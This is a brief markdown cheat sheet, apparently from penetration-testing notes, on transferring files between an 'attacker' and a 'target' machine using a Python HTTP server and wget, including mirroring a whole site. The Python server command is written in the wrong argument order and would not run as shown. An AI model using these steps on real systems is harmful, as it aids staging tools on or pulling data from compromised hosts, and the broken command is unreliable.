# Download Files Remotely

1. Setup python server (On attacker/target)

```
python3 -m 8080 http.server
```

2. Downlad fiels (on attacker/target)

```
wget http://ip_address:port/filename
```

Or to download all files

```
wget -m --no-parent http://target-ip-or-domain/
```
